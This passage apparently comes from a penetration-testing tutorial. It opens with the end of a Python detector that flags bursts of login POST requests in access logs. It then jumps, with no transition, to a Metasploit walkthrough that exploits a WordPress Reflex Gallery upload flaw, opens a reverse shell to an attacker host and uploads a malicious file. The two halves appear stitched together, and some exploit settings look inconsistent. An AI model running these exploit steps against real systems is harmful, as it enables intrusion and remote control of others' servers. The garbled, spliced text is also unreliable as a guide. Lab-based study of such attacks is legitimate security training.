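                        window: timedelta = timedelta(seconds=60)) -> List[Dict[str, object]]:
    """Flag clients with >= threshold login POSTs inside any window of the given length."""
    attempts: Dict[str, List[datetime]] = defaultdict(list)
    successes: Dict[str, List[datetime]] = defaultdict(list)
    for ip, ts, method, path, status in parse_access_log(lines):
        if method == "POST" and path.endswith(LOGIN_PATHS):
            attempts[ip].append(ts)
            if status == 302:
                successes[ip].append(ts)
    alerts = []
    for ip, times in attempts.items():
        times.sort()
        best, j = 0, 0
        for i in range(len(times)):  # two-pointer sliding window over sorted timestamps
            while times[i] - times[j] > window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            alerts.append({"ip": ip, "count": best, "first": times[0], "last": times[-1],
                           "success_after_burst": any(s >= times[0] for s in successes[ip])})
    return alerts


if __name__ == "__main__":
    for a in detect_login_bursts(SAMPLE_ACCESS_LOG):
        print(f"{a['ip']}: {a['count']} login POSTs between {a['first']:%H:%M:%S} and "
              f"{a['last']:%H:%M:%S}; success seen: {a['success_after_burst']}")
```

An alert with success_after_burst set is the case to escalate: the account named in the last POST before the 302 should be locked and its password rotated. The same window logic works on xmlrpc.php, where a single request can carry many credential pairs via system.multicall, so a lower threshold is appropriate for that path.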
Step 3: Exploit Reflex Gallery
- Load exploit:
    msf6 > use exploit/unix/webapp/wp_reflexgallery_file_upload
- Configure:
    msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOSTS 192.168.1.10
    msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI /wordpress/wp-admin/
    msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set USERNAME admin
    msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set PASSWORD password123
    msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set PAYLOAD cmd/unix/reverse_python
    msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.1.100
    msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT 4444
- Exploit:
    msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit
  Output:
    [*] Started reverse TCP handler on 192.168.1.100:4444
    [+] Uploaded shell: /wordpress/wp-content/uploads/shell.php
    [*] Meterpreter session 1 opened
Step 4: Post-Exploitation
    meterpreter > sysinfo
    meterpreter > upload /root/malicious.txt /var/www/html/
    meterpreter > shell
Output:
    whoami
    www-data
Visuals: Web Security Academy’s WordPress labs show similar exploits.
Conclusion
The Metasploit Framework is a cornerstone of penetration testing, offering unparalleled automation and flexibility. By following this roadmap—from fundamentals to advanced exploitation—you can master Metasploit for real-world scenarios. Practice ethically in lab environments like TryHackMe, Hack The Box, or Web Security Academy to build skills and strengthen defenses.
Author: Engr. M A Rashid Rony
Date: September 6, 2025
For updates, visit: https://www.metasploit.com




